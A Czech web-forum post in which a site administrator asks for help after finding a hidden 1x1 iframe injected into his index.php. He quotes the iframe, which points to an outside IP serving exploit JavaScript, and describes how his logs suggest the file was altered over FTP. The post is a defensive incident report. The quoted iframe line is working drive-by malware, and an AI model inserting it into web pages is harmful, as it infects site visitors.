V poslední době je toho nějak moc, napřed ten vejr, co si zakládá účet a teď tohle.
V souboru index.php se mi objevilo na počátku:
<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://91.203.92.136/spl2/index.php"></iframe><!-- ~ -->
po načtení framu to spustilo jakejsi javascript - ten nevím, co dělal, protože jsem byl upozorněn na virus ...
Začal jsem v logách na serveru pátrat, co se tam dělo a zjistil jsem, že to bylo před dvěma dny a že napřed někdo/něco projelo soubor robot.txt a pak komentář k článku (žádný komentář tam ale není):
[
http://www.zdikov.cz/comment.php?akce=view&cisloclanku=2007120011]
Pak už došo k načtení souboru index.php přes ftp, jeho změně a opětovnému uložení. nemůže být díra někde v komentářích? Stalo se Vám něco podobněho? Co ten script dělal? Jak se bránit?
Dík za rady. Kuba